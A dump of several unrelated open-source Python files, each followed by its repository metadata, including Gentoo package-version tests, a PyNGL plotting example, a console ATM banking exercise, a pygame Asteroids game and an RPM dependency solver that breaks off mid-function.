msg="checking cmp for %r, %r, not supposed to be equal, got %i"
% (o1, o2, c))
self.assertNotEqual(o2, o1)
c = cmp(o2, o1)
self.assertNotEqual(c, 0,
msg="checking cmp for %r, %r, not supposed to be equal, got %i"
% (o2, o1, c))
def test_comparison(self):
self.assertEqual2(CPV('pkg'), CPV('pkg'))
self.assertNotEqual2(CPV('pkg'), CPV('pkg1'))
self.assertEqual2(CPV('cat/pkg'), CPV('cat/pkg'))
self.assertNotEqual2(CPV('cat/pkg'), CPV('cat/pkgb'))
self.assertNotEqual2(CPV('cata/pkg'), CPV('cat/pkg'))
self.assertEqual2(CPV('cat/pkg-0.1'), CPV('cat/pkg-0.1'))
self.assertNotEqual2(CPV('cat/pkg-1.0'), CPV('cat/pkg-1'))
self.assertEqual2(CPV('cat/pkg-0'), CPV('cat/pkg-0'))
self.assertEqual2(CPV('cat/pkg-1-r1'), CPV('cat/pkg-1-r1'))
self.assertNotEqual2(CPV('cat/pkg-2-r1'), CPV('cat/pkg-2-r10'))
self.assertEqual2(CPV('cat/pkg-1_rc2'), CPV('cat/pkg-1_rc2'))
self.assertNotEqual2(CPV('cat/pkg-2_rc2-r1'), CPV('cat/pkg-2_rc1-r1'))
def test_compare_strs(self):
# Test ordering of package strings, Portage has test for vercmp,
# so just do the rest
version_tests = [
# different categories
('sys-apps/portage-2.1.6.8', 'sys-auth/pambase-20080318'),
# different package names
('sys-apps/pkgcore-0.4.7.15-r1', 'sys-apps/portage-2.1.6.8'),
# different package versions
('sys-apps/portage-2.1.6.8', 'sys-apps/portage-2.2_rc25')
]
# Check less than
for vt in version_tests:
self.assertTrue(compare_strs(vt[0], vt[1]) == -1)
# Check greater than
for vt in version_tests:
self.assertTrue(compare_strs(vt[1], vt[0]) == 1)
# Check equal
vt = ('sys-auth/pambase-20080318', 'sys-auth/pambase-20080318')
self.assertTrue(compare_strs(vt[0], vt[1]) == 0)
def test_chunk_splitting(self):
all_tests = [
# simple
('sys-apps/portage-2.2', {
'category': 'sys-apps',
'name': 'portage',
'cp': 'sys-apps/portage',
'version': '2.2',
'revision': '',
'fullversion': '2.2'
}),
# with rc
('sys-apps/portage-2.2_rc10', {
'category': 'sys-apps',
'name': 'portage',
'cp': 'sys-apps/portage',
'version': '2.2_rc10',
'revision': '',
'fullversion': '2.2_rc10'
}),
# with revision
('sys-apps/portage-2.2_rc10-r1', {
'category': 'sys-apps',
'name': 'portage',
'cp': 'sys-apps/portage',
'version': '2.2_rc10',
'revision': 'r1',
'fullversion': '2.2_rc10-r1'
}),
# with dash (-) in name (Bug #316961)
('c-portage', {
'category': '',
'name': 'c-portage',
'cp': 'c-portage',
'version': '',
'revision': '',
'fullversion': ''
}),
# with dash (-) in name (Bug #316961)
('sys-apps/c-portage-2.2_rc10-r1', {
'category': 'sys-apps',
'name': 'c-portage',
'cp': 'sys-apps/c-portage',
'version': '2.2_rc10',
'revision': 'r1',
'fullversion': '2.2_rc10-r1'
}),
]
for test in all_tests:
cpv = CPV(test[0])
keys = ('category', 'name', 'cp', 'version', 'revision', 'fullversion')
for k in keys:
self.assertEqual(
getattr(cpv, k), test[1][k]
)
def test_main():
suite = unittest.TestLoader().loadTestsFromTestCase(TestGentoolkitCPV)
unittest.TextTestRunner(verbosity=2).run(suite)
test_main.__test__ = False
if __name__ == '__main__':
test_main()
|
zmedico/gentoolkit
|
pym/gentoolkit/test/test_cpv.py
|
Python
|
gpl-2.0
| 4,141
|
"""
NCL User Guide Python Example: PyNGL_unstructured_contour_cellfill.py
- unstructured data (ICON)
- contour plot
- CellFill
05.06.15 kmf
"""
import numpy as np
import math, time
import sys,os
import Ngl,Nio
#----------------------
#-- MAIN
#----------------------
t1 = time.time() #-- retrieve start time
print ""
#-- define variables
diri = "./" #-- data path
fname = "ta_ps_850.nc" #-- data file
gname = "r2b4_amip.nc" #-- grid info file
#---Test if files exist
if(not os.path.exists(diri+fname) or not os.path.exists(diri+gname)):
print("You do not have the necessary files to run this example, '%s' and '%s'." % (diri+fname,diri+gname))
print("You can get the files from the NCL website at:")
print("http://www.ncl.ucar.edu/Document/Manuals/NCL_User_Guide/Data/")
sys.exit()
#-- open file and read variables
f = Nio.open_file(diri + fname,"r") #-- add data file
g = Nio.open_file(diri + gname,"r") #-- add grid file (not contained in data file!!!)
#-- read a timestep of "ta"
var = f.variables["ta"][0,0,:] #-- first time step, lev, ncells
print "-----------------------"
print f.variables["ta"] #-- like printVarSummary
print "-----------------------"
title = "ICON: Surface temperature" #-- title string
varMin = 230 #-- data minimum
varMax = 310 #-- data maximum
varInt = 2 #-- data increment
levels = range(varMin,varMax,varInt) #-- set levels array
#-------------------------------------------------------------------
#-- define the x-, y-values and the polygon points
#-------------------------------------------------------------------
rad2deg = 45./np.arctan(1.) #-- radians to degrees
x = g.variables["clon"][:] #-- read clon
y = g.variables["clat"][:] #-- read clat
vlon = g.variables["clon_vertices"][:] #-- read clon_vertices
vlat = g.variables["clat_vertices"][:] #-- read clat_vertices
ncells = vlon.shape[0] #-- number of cells
nv = vlon.shape[1] #-- number of edges
x = x * rad2deg #-- cell center, lon
y = y * rad2deg #-- cell center, lat
vlat = vlat * rad2deg #-- cell latitude vertices
vlon = vlon * rad2deg #-- cell longitude vertices
#-- longitude values -180. - 180.
for j in range(ncells):
    for i in range(nv):
if vlon[j,i] < -180. :
vlon[j,i] = vlon[j,i] + 360.
if vlon[j,i] > 180. :
vlon[j,i] = vlon[j,i] - 360.
#-- information
print ""
print "Cell points: ", nv
print "Cells: ", str(ncells)
print "Variable ta min/max: %.2f " % np.min(var) + "/" + " %.2f" % np.max(var)
print ""
#-- open a workstation
wks_type = "png"
wks = Ngl.open_wks(wks_type,"plot_contour_unstructured_ngl") #-- open a workstation
#-- set resources
res = Ngl.Resources() #-- plot mods desired.
res.nglDraw = False #-- turn off plot draw and frame advance. We will
res.nglFrame = False #-- do it later after adding subtitles.
res.cnFillOn = True #-- color plot desired
res.cnFillMode = "CellFill" #-- set fill mode
res.cnFillPalette = "BlueWhiteOrangeRed" #-- choose colormap
res.cnLinesOn = False #-- turn off contour lines
res.cnLineLabelsOn = False #-- turn off contour labels
res.cnLevelSelectionMode = "ExplicitLevels" #-- use explicit levels
res.cnLevels = levels #-- set levels
res.lbOrientation = "Horizontal" #-- vertical by default
res.lbBoxLinesOn = False #-- turn off labelbar boxes
res.lbLabelFontHeightF = 0.01 #-- labelbar label font size
res.mpFillOn = False #-- don't use filled map
res.mpGridAndLimbOn = False #-- don't draw grid lines
res.sfXArray = x #-- transform x to mesh scalar field
res.sfYArray = y #-- transform y to mesh scalar field
res.sfXCellBounds = vlon #-- needed if set cnFillMode = "CellFill"
res.sfYCellBounds = vlat #-- needed if set cnFillMode = "CellFill"
res.tiMainString = "Unstructured grid: ICON" #-- title string
res.tiMainOffsetYF = 0.03 #-- move main title towards plot
#-- create the plot
plot = Ngl.contour_map(wks,var,res)
#-- draw the plot and advance the frame
Ngl.draw(plot)
Ngl.frame(wks)
#-- get wallclock time
t2 = time.time()
print "Wallclock time: %0.3f seconds" % (t2-t1)
print ""
Ngl.end()
|
likev/ncl
|
ncl_ncarg_src/ni/src/examples/nug/NUG_unstructured_contour_cellfill_PyNGL.py
|
Python
|
gpl-2.0
| 5,242
|
#! /usr/bin/env python3
from publicAPI import auth_account, register_account, change_admin_password
from publicAPI import modify_admin_account_info, add_admin_account, delete_account, change_admin_permission
from config.settings import user_info
from publicAPI import for_super_admin_change_password, for_admin_unlock_account, for_admin_lock_account
from record_log import Logger
from publicAPI import change_user_credit_line, show_account_info, for_owner_change_password
from publicAPI import transfer_cash, search_history_log
from publicAPI import for_admin_withdraw_money
bank_log_file = "china_bank.log" # 银行基本日志
sold_log_file = "sold_bank.log" # 用户交易日志
def update_info(user_info_dict, file_path="./config/settings.py", name="user_info = "): # 接收一个字典字符串,然后写入到文件,把一个字典类型参数写入文件
import re
write_data = re.findall('["\'\[\]\w,:\s=\d@.\-]+\{*|\}', name + str(user_info_dict).replace("'", '"'))
count = 0
with open(file_path, 'w') as database:
for content in write_data:
if content.find('{') != -1:
database.write('%s%s\n' % (str(count * '\t').expandtabs(4), content))
count += 1
elif content.find('}') != -1:
database.write('%s%s\n' % (str(count * '\t').expandtabs(4), content))
count -= 1
else:
database.write('%s%s\n' % (str(count * '\t').expandtabs(4), content))
database.close()
return True
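# Usage sketch (editor's addition; the account key names are assumptions):
# persist an updated in-memory user_info dict back to ./config/settings.py:
#
#     user_info["user_bank"]["alice"]["user_status"] = "2"
#     update_info(user_info)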
def atm_self_service(quit_atm_self_service=False):  # ATM self-service system
while not quit_atm_self_service:
print("""欢迎使用 中国建都银行 自助服务系统
============================================
普通客户大众版平台(1) 银行前台专业版管理中心(2)
返回(b) 退出(q)
============================================
""")
wait_choose = str(input("请选择操作:")).strip()
if wait_choose == "1":
Logger(bank_log_file).write_log(status=True, event="进入普通客户大众版平台")
quit_atm_self_service = public_login(bank_log_file, quit_atm_self_service) # 进入大众版登陆系统
elif wait_choose == "2":
Logger(bank_log_file).write_log(user=None, status=True, event="进入银行前台管理页面")
quit_atm_self_service = admin_bank_system(bank_log_file, quit_atm_self_service) # 进入管理员操作平台
elif str(wait_choose).lower() in ['q', 'quit', ]:
quit_atm_self_service = True
print("谢谢使用,再见 !")
Logger(bank_log_file).write_log(status=True, event="退出")
break
elif str(wait_choose).lower() in ['b', 'back', ]:
break
else:
print("操作有误 !!!")
return quit_atm_self_service
def public_login(log_file, quit_public_login=False):
while not quit_public_login:
try:
user_database = user_info["user_bank"]
except KeyError:
user_info["user_bank"] = {}
user_database = user_info["user_bank"]
print("""欢迎进入 中国建都银行 用户中心
=========================================
用户登陆(1)
返回(b) 退出(q)
=========================================
""")
wait_choose = str(input("请选择操作:")).strip()
if wait_choose == "1":
get_user = auth_account(user_database, log_file=log_file)
if type(get_user) == dict: # 如果有数据返回,且不是True,则该账户被锁定,写入数据
user_info["user_bank"] = get_user
update_info(user_info)
elif get_user:
try:
user_status = user_info["user_bank"][get_user]["user_status"]
if user_status == "0": # 当登陆成功后,重置用户登陆错误状态
user_info["user_bank"][get_user]["user_status"] = "2"
update_info(user_info)
except KeyError:
pass
quit_public_login = public_user_system(get_user, quit_public_login, log_file)
elif str(wait_choose).lower() in ['q', 'quit', ]:
quit_public_login = True
print("谢谢使用,再见 !")
Logger(log_file).write_log(status=True, event="退出")
break
elif str(wait_choose).lower() in ['b', 'back', ]:
break
else:
print("操作有误 !!!")
return quit_public_login
def public_user_system(user, quit_user_system=False, log_file=None):
while not quit_user_system:
user_database = user_info["user_bank"]
print("""欢迎使用 中国建都银行 用户[%s]已登陆
===============================================
个人信息(1) 修改密码(2)
转账(3) 取现(4) 还款(5)
交易记录(6) 操作日志(7)
账单查询(8)
注销(b) 退出(q)
===============================================
""" % user)
wait_choose = str(input("请选择操作:")).strip()
if wait_choose == "1":
show_account_info(user_database, user, is_admin=False, log_file=log_file)
elif wait_choose == "2":
get_database = for_owner_change_password(user_database, user, log_file=log_file)
if type(get_database) == dict:
user_info["user_bank"] = get_database
update_info(user_info)
elif wait_choose == "3":
get_database = transfer_cash(user_database, user, log_file=log_file, sold_log=sold_log_file)
if type(get_database) == dict:
user_info["user_bank"] = get_database
update_info(user_info)
elif wait_choose == "4":
            get_database = for_admin_withdraw_money(user_database, user, log_file=log_file, sold_log=sold_log_file)
if type(get_database) == dict:
user_info["user_bank"] = get_database
update_info(user_info)
elif wait_choose == "6":
search_history_log(user, log_file=log_file, sold_log=sold_log_file, is_sold=True)
elif wait_choose == "7":
search_history_log(user, log_file=log_file)
elif str(wait_choose).lower() in ['q', 'quit', ]:
quit_user_system = True
print("谢谢使用,再见 !")
Logger(log_file).write_log(user=user, status=True, event="退出")
break
elif str(wait_choose).lower() in ['b', 'back', ]:
break
else:
print("操作有误 !!!")
return quit_user_system
def admin_bank_system(log_file, quit_admin_bank=False):  # bank staff operations platform
while not quit_admin_bank:
open_register = "首次注册(2)"
try:
admin_database = user_info['admin_bank']
except KeyError:
user_info['admin_bank'] = {}
admin_database = user_info['admin_bank']
if len(admin_database) > 0:
            open_register = False  # an admin account already exists, so close self-registration; more admins can only be added after login
open_login = "管理员登录(1)"
else:
open_login, open_register = open_register, True
print("""欢迎进入 中国建都银行 管理平台
============================================
%s
返回(b) 退出(q)
============================================
""" % open_login)
wait_choose = str(input("请选择操作:")).strip()
if wait_choose == "1" and not open_register:
            get_admin = auth_account(admin_database, is_admin=True, log_file=log_file)  # call the login module
            if get_admin:
                quit_admin_bank = admin_management(get_admin, quit_admin_bank, log_file=log_file)  # enter the admin management center
        elif wait_choose == "2" and open_register:  # registration is only open while the database holds no users at all
            get_database = register_account(admin_database, is_admin=True, log_file=log_file)  # call the registration module
            if get_database:
                user_info['admin_bank'] = get_database  # update the database
                update_info(user_info)  # write it to disk
elif str(wait_choose).lower() in ['q', 'quit', ]:
quit_admin_bank = True
print("谢谢使用,再见 !")
Logger(log_file).write_log(status=True, event="退出")
break
elif str(wait_choose).lower() in ['b', 'back', ]:
break
else:
print("操作有误 !!!")
return quit_admin_bank
def admin_management(admin_name, quit_admin_management=False, log_file=None):  # account operations after a successful admin login
while not quit_admin_management:
try:
user_database = user_info["user_bank"]
except KeyError:
user_info["user_bank"] = {}
user_database = user_info["user_bank"]
if not user_info["admin_bank"].get(admin_name):
break
print("""中国建都银行 管理中心 [%s]已登陆
===========================================
开户(1) 修改密码(2) 查询账户(s)
存钱(3) 取钱(4)
额度(5) 解锁(6)
挂失(7) 销户(8)
管理员帐户管理(9)
注销(b) 退出(q)
===========================================
""" % admin_name)
wait_choose = str(input("请选择操作:")).strip()
if wait_choose == "1":
get_database = register_account(user_database, log_file=log_file)
if type(get_database) == dict:
user_info["user_bank"] = get_database
update_info(user_info)
elif wait_choose == "2":
get_database = for_super_admin_change_password(user_database, admin_name, log_file=log_file)
if type(get_database) == dict:
user_info["user_bank"] = get_database
update_info(user_info)
elif wait_choose == "3":
print("该功能暂未开放")
elif wait_choose == "4":
print("该功能暂未开放")
elif wait_choose.lower() == "s":
show_account_info(user_database, admin_name, is_admin=True, log_file=log_file)
elif wait_choose == "5":
get_database = change_user_credit_line(user_database, admin_name, log_file=log_file)
if type(get_database) == dict:
                user_info['user_bank'] = get_database  # update the database
update_info(user_info)
elif wait_choose == "6":
get_database = for_admin_unlock_account(user_database, admin_name, log_file=log_file)
if type(get_database) == dict:
user_info["user_bank"] = get_database
update_info(user_info)
elif wait_choose == "7":
get_database = for_admin_lock_account(user_database, admin_name, log_file=log_file)
if type(get_database) == dict:
user_info["user_bank"] = get_database
update_info(user_info)
elif wait_choose == "8":
get_database = delete_account(user_database, admin_name, is_admin=False, log_file=log_file)
if type(get_database) == dict:
                user_info['user_bank'] = get_database  # update the database
update_info(user_info)
elif wait_choose == "9":
quit_admin_management = management_admin_account(
                admin_name, quit_admin_management, log_file=log_file)  # operate on admin accounts
elif str(wait_choose).lower() in ['q', 'quit', ]:
quit_admin_management = True
Logger(log_file).write_log(user=admin_name, status=True, event="管理员退出")
print("谢谢使用,再见 !")
break
elif str(wait_choose).lower() in ['b', 'back', ]:
Logger(log_file).write_log(user=admin_name, status=True, event="管理员注销")
break
else:
print("操作有误 !!!")
return quit_admin_management
def management_admin_account(admin_name, quit_management_account, log_file=None):
while not quit_management_account:
admin_database = user_info['admin_bank']
if not admin_database.get(admin_name):
break
print("""中国建都银行 管理中心 [%s]已登陆
===========================================
添加管理账号(1)
删除管理账号(2)
更改账号权限(3)
更改账号信息(4)
修改管理员密码(5)
返回(b) 退出(q)
===========================================
""" % admin_name)
wait_choose = str(input("请选择操作:")).strip()
if wait_choose == "1":
get_database = add_admin_account(admin_database, admin_name, is_admin=True, log_file=log_file)
if type(get_database) == dict:
                user_info['admin_bank'] = get_database  # update the database
update_info(user_info)
elif wait_choose == "2":
get_database = delete_account(admin_database, admin_name, is_admin=True, log_file=log_file)
if type(get_database) == dict:
                user_info['admin_bank'] = get_database  # update the database
update_info(user_info)
elif wait_choose == "3":
get_database = change_admin_permission(admin_database, admin_name, log_file=log_file)
if type(get_database) == dict:
                user_info['admin_bank'] = get_database  # update the database
update_info(user_info)
elif wait_choose == "4":
get_database = modify_admin_account_info(admin_database, admin_name, is_admin=True, log_file=log_file)
if type(get_database) == dict:
                user_info['admin_bank'] = get_database  # update the database
update_info(user_info)
elif wait_choose == "5":
get_database = change_admin_password(admin_database, admin_name, log_file=log_file)
if type(get_database) == dict:
                user_info['admin_bank'] = get_database  # update the database
update_info(user_info)
elif str(wait_choose).lower() in ['q', 'quit', ]:
quit_management_account = True
Logger(log_file).write_log(user=admin_name, status=True, event="管理员退出")
print("谢谢使用,再见 !")
break
elif str(wait_choose).lower() in ['b', 'back', ]:
break
else:
print("操作有误 !!!")
return quit_management_account
|
zengchunyun/s12
|
day5/ATM_mall/ATM/__init__.py
|
Python
|
gpl-2.0
| 14,978
|
from unittest import TestCase
from brainiak.handlers import ClassHandler, VersionHandler, \
HealthcheckHandler, VirtuosoStatusHandler, InstanceHandler, SuggestHandler, \
    StoredQueryCollectionHandler, StoredQueryCRUDHandler, \
StoredQueryExecutionHandler
from brainiak.routes import ROUTES
class RouteTestCase(TestCase):
def test_healthcheck(self):
regex = self._regex_for(HealthcheckHandler)
        HEALTHCHECK_SUFFIX = '/healthcheck'
        self.assertTrue(regex.match(HEALTHCHECK_SUFFIX))
def test_version(self):
regex = self._regex_for(VersionHandler)
VERSION_SUFFIX = '/_version'
self.assertTrue(regex.match(VERSION_SUFFIX))
def test_status_virtuoso(self):
regex = self._regex_for(VirtuosoStatusHandler)
VIRTUOSO_STATUS = '/_status/virtuoso'
self.assertTrue(regex.match(VIRTUOSO_STATUS))
def test_range_search(self):
regex = self._regex_for(SuggestHandler)
        SUGGEST_SUFFIX = '/_suggest'
        self.assertTrue(regex.match(SUGGEST_SUFFIX))
def test_schema_resource(self):
regex = self._regex_for(ClassHandler)
VALID_SCHEMA_RESOURCE_SUFFIX = '/person/Gender/_schema'
match_pattern = regex.match(VALID_SCHEMA_RESOURCE_SUFFIX)
expected_params = {"context_name": "person", "class_name": "Gender"}
self.assertTrue(self._groups_match(match_pattern, expected_params))
def test_invalid_schema_resource(self):
regex = self._regex_for(ClassHandler)
INVALID_SCHEMA_RESOURCE_SUFFIX = '/person/Gender/'
match_pattern = regex.match(INVALID_SCHEMA_RESOURCE_SUFFIX)
self.assertFalse(self._groups_match(match_pattern, {}))
def test_invalid_schema_resource_with_unexpected_params(self):
regex = self._regex_for(ClassHandler)
VALID_SCHEMA_RESOURCE_SUFFIX = '/person/Gender/_schema'
match_pattern = regex.match(VALID_SCHEMA_RESOURCE_SUFFIX)
unexpected_params = {"context_name": "person",
"class_name": "Gender",
"unexpected_param": "param"}
self.assertFalse(self._groups_match(match_pattern, unexpected_params))
def test_invalid_schema_resource_nonexistent_suffix(self):
regex = self._regex_for(ClassHandler)
INVALID_SCHEMA_RESOURCE_SUFFIX = '/person/Gender/_class_schema'
match_pattern = regex.match(INVALID_SCHEMA_RESOURCE_SUFFIX)
unexpected_params = {"context_name": "person", "class_name": "Gender"}
self.assertFalse(self._groups_match(match_pattern, unexpected_params))
def test_instance_resource(self):
regex = self._regex_for(InstanceHandler)
VALID_INSTANCE_RESOURCE_SUFFIX = "/person/Gender/Male"
match_pattern = regex.match(VALID_INSTANCE_RESOURCE_SUFFIX)
expected_params = {"context_name": "person",
"class_name": "Gender",
"instance_id": "Male"}
self.assertTrue(self._groups_match(match_pattern, expected_params))
def test_instance_resource_nonexistent_params(self):
regex = self._regex_for(InstanceHandler)
VALID_INSTANCE_RESOURCE_SUFFIX = "/person/Gender/Male"
match_pattern = regex.match(VALID_INSTANCE_RESOURCE_SUFFIX)
expected_params = {"context_name": "person",
"class_name": "Gender",
"crazy_parameter": "crazy_value"}
self.assertFalse(self._groups_match(match_pattern, expected_params))
def test_stored_query_route_list_all(self):
regex = self._regex_for(StoredQueryCollectionHandler)
VALID_STORED_QUERY_COLLECTION_SUFFIX = "/_query"
match = regex.match(VALID_STORED_QUERY_COLLECTION_SUFFIX)
self.assertTrue(match is not None)
def test_stored_query_route_crud(self):
regex = self._regex_for(StoredQueryCRUDHandler)
VALID_STORED_QUERY_CRUD_SUFFIX = "/_query/query_id"
match_pattern = regex.match(VALID_STORED_QUERY_CRUD_SUFFIX)
expected_params = {"query_id": "query_id"}
self.assertTrue(self._groups_match(match_pattern, expected_params))
def test_stored_query_route_execution(self):
regex = self._regex_for(StoredQueryExecutionHandler)
VALID_INSTANCE_RESOURCE_SUFFIX = "/_query/query_id/_result"
match_pattern = regex.match(VALID_INSTANCE_RESOURCE_SUFFIX)
expected_params = {"query_id": "query_id"}
self.assertTrue(self._groups_match(match_pattern, expected_params))
def _regex_for(self, klass):
return filter(lambda u: u.handler_class == klass, ROUTES)[0].regex
def _groups_match(self, match, groups):
if match is None or len(groups) == 0:
return False
for group in groups.keys():
try:
if not match.group(group) == groups[group]:
return False
except IndexError:
return False
return True
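# Editor's note: _regex_for() above relies on Python 2 semantics, where
# filter() returns a subscriptable list. A Python 3-compatible equivalent
# would be (sketch):
#
#     def _regex_for(self, klass):
#         return next(u.regex for u in ROUTES if u.handler_class == klass)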
|
bmentges/brainiak_api
|
tests/unit/test_routes.py
|
Python
|
gpl-2.0
| 5,018
|
import asteroid
import math
import pygame
from pygame.locals import *
import random
import ship
import sys
'''Pygame constants'''
SCR_WIDTH, SCR_HEIGHT = 640, 480
FPS = 30
'''Misc stuff'''
starfield = []
NUM_STARS = 45
asteroids = []
NUM_ASTEROIDS = 3
'''Pygame init'''
pygame.init()
fps_timer = pygame.time.Clock()
screen = pygame.display.set_mode((SCR_WIDTH, SCR_HEIGHT))
player = ship.Ship(SCR_WIDTH, SCR_HEIGHT)
def init_starfield():
global starfield
for i in range(NUM_STARS):
x = random.random() * SCR_WIDTH
y = random.random() * SCR_HEIGHT
starfield.insert(i, (x,y))
init_starfield()
def init_asteroids():
for i in range(NUM_ASTEROIDS):
asteroids.append(asteroid.Asteroid(SCR_WIDTH, SCR_HEIGHT))
init_asteroids()
first_pass = True
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
if event.type == KEYDOWN:
if event.key == K_RIGHT or event.key == K_d:
player.rotate_right = True
elif event.key == K_LEFT or event.key == K_a:
player.rotate_left = True
if event.key == K_UP or event.key == K_w:
player.thrusting = True
if event.key == K_SPACE:
player.fire = True
if event.type == KEYUP:
if event.key == K_RIGHT or event.key == K_d:
player.rotate_right = False
if event.key == K_LEFT or event.key == K_a:
player.rotate_left = False
if event.key == K_UP or event.key == K_w:
player.thrusting = False
if event.key == K_SPACE:
player.fire = False
if player.rotate_right:
player.angle += player.ROTATE_SPEED
elif player.rotate_left:
player.angle -= player.ROTATE_SPEED
if player.thrusting:
vel = player.thrust(player.angle)
player.xvel += vel[0]
player.yvel += vel[1]
if math.fabs(player.xvel) > player.MAX_VEL:
player.xvel = math.copysign(player.MAX_VEL, player.xvel)
if math.fabs(player.yvel) > player.MAX_VEL:
player.yvel = math.copysign(player.MAX_VEL, player.yvel)
else:
if math.fabs(player.xvel) > 0.0:
player.xvel += -(math.copysign(player.FRICTION, player.xvel))
else:
player.xvel = 0.0
if math.fabs(player.yvel) > 0.0:
player.yvel += -(math.copysign(player.FRICTION, player.yvel))
else:
player.yvel = 0.0
if player.fire:
player.fire_bullet(player.angle, player.points[0][0], player.points[0][1])
player.fire = False
if len(player.bullets) > 0:
player.update_bullets()
player.rotate(player.centx, player.centy)
player.trans()
player.centx += player.xvel
player.centy += player.yvel
centroid = player.wrap()
player.centx = centroid[0]
player.centy = centroid[1]
# print('xvel = ' + str(xvel) + ', yvel = ' + str(yvel) + ', angle = ' + str(angle))
screen.fill((32,32,32))
for star in starfield:
pygame.draw.rect(screen, (255,255,255), (star[0], star[1], 2, 2))
for bullet in player.bullets:
pygame.draw.rect(screen, (255, 255, 0), (bullet[1], bullet[2], 2, 2))
for each_asteroid in asteroids:
each_asteroid.move()
each_asteroid.render(screen)
player.render(screen)
pygame.display.flip()
fps_timer.tick(FPS)
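# Editor's note: the movement model above is the classic Asteroids scheme --
# ship.thrust(angle) presumably resolves the facing angle into velocity
# deltas, each axis is clamped to +/- MAX_VEL via math.copysign(), and a
# constant FRICTION is bled off per frame while not thrusting. Roughly
# (illustrative constants, not the actual ship.Ship implementation):
#
#     dx = math.cos(math.radians(angle)) * THRUST
#     dy = math.sin(math.radians(angle)) * THRUST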
|
vitriolik/Asteroids2
|
asteroids.py
|
Python
|
gpl-2.0
| 3,039
|
# Copyright 2008, Red Hat, Inc
# Steve Salevan <ssalevan@redhat.com>
#
# This software may be freely redistributed under the terms of the GNU
# general public license.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
import func_module
import func.overlord.client as fc
from certmaster import certmaster as certmaster
from func import utils
class OverlordModule(func_module.FuncModule):
version = "0.0.1"
api_version = "0.0.1"
description = "Module for controlling minions that are also overlords."
def map_minions(self,get_only_alive=False):
"""
Builds a recursive map of the minions currently assigned to this
overlord
"""
maphash = {}
current_minions = []
if get_only_alive:
ping_results = fc.Overlord("*").test.ping()
for minion in ping_results.keys():
                if ping_results[minion] == 1:  # if the minion is alive
                    current_minions.append(minion)  # add it to the list of current minions
else:
cm = certmaster.CertMaster()
current_minions = cm.get_signed_certs()
for current_minion in current_minions:
maphash[current_minion] = fc.Overlord(current_minion).overlord.map_minions()[current_minion]
return maphash
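# Editor's note: a minimal usage sketch (assumes a configured func/certmaster
# deployment; hostnames and the nesting shown are illustrative):
#
#     tree = OverlordModule().map_minions(get_only_alive=True)
#     # e.g. {'minion1.example.com': {'sub1.example.com': {}, ...}}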
|
pombredanne/func
|
func/minion/modules/overlord.py
|
Python
|
gpl-2.0
| 1,452
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Setup Script for Speak
You can install Speak with
python setup.py install
"""
import os
import re
import sys
from setuptools import find_packages, setup
if sys.argv[-1] == 'setup.py':
print("To install, run 'python setup.py install'")
print()
if sys.version_info[:2] < (3, 3):
print("Speak requires Python 3.3 or later (%d.%d detected)." %
sys.version_info[:2])
sys.exit(-1)
with open(os.path.join("speak", "__init__.py"), "r") as f:
version = re.search("__version__ = \"([^\"]+)\"", f.read()).group(1)
try:
import pypandoc
readme = pypandoc.convert("README.md", "rst")
except ImportError:
with open("README.md", "r") as f:
readme = f.read()
classifiers = ["Development Status :: 3 - Alpha",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: End Users/Desktop",
"License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Topic :: Multimedia :: Sound/Audio :: Sound Synthesis",
"Topic :: Multimedia :: Sound/Audio :: Speech",
"Topic :: Utilities"]
requirements = ['requests>=2.3.0,<2.6.0']
setup(name="speak",
version=version,
author="jamalsenouci",
packages=find_packages(),
entry_points={"console_scripts": ["speak = speak:cl_main"]},
install_requires=requirements,
description="Read text using Google voice tts service",
long_description=readme,
license='LICENSE.txt',
url="https://github.com/jamalsenouci/speak",
download_url="https://github.com/jamalsenouci/speak/archive/%s.tar.gz" % (version),
keywords=["speech", "audio", "synthesis", "voice", "google"],
classifiers=classifiers,
test_suite='nose.collector',
tests_require=['nose>=0.10.1'])
|
jamalsenouci/speak
|
setup.py
|
Python
|
gpl-2.0
| 2,219
|
#! /usr/bin/env python
# rpm_solver.py
# Given a pile of RPMs will check dependency closure, will attempt to figure out
# their installation order.
#
# Copyright 2005 Progeny Linux Systems, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Author: Sam Hart
import os
import fnmatch
import getopt
import sys
import rpm
import traceback
import commands
import tempfile
class progress_bar:
def __init__(self, prefix="Progress :", prog_char="-", col=60, outnode=sys.stdout):
self.f = outnode
self.prog_char = prog_char
self.col = col
self.spinner = ["|", "/", "-", "\\"]
self.spin_count = 0
self.prefix = prefix
def set(self, prefix="Progress :"):
self.prefix = prefix
def clear(self):
self.f.write("\r")
for i in range(0, self.col):
self.f.write(" ")
self.f.write("\r")
self.f.flush()
def progress(self, percentage):
"""Count must be out of 100%"""
if percentage > 1.0:
percentage = 1.0
self.f.write(("\r%s 0 |") % self.prefix)
width = self.col - len(("\r%s 0 100 |") % self.prefix) + 1
count = width * percentage
i = 1
while i < count:
self.f.write(self.prog_char)
i = i + 1
if count < width:
self.f.write(">")
while i < width:
self.f.write(" ")
i = i + 1
if self.spin_count >= len(self.spinner):
self.spin_count = 0
self.f.write(self.spinner[self.spin_count])
self.spin_count = self.spin_count + 1
self.f.write(" 100 ")
self.f.flush()
class rpm_solver:
def __init__(self, progress=0, verbose=0):
self.progress = progress
self.verbose = verbose
self._initdb = 0
col = commands.getoutput("echo \"$COLUMNS\"")
try:
columns = int(col)
except:
columns = 60
self.pb = progress_bar("rpm_solver :", "-", columns, sys.stderr)
def init_db(self, rpm_dir, avail_dir=None, recursive=0, work_dir=tempfile.mkdtemp()):
""" Init the database """
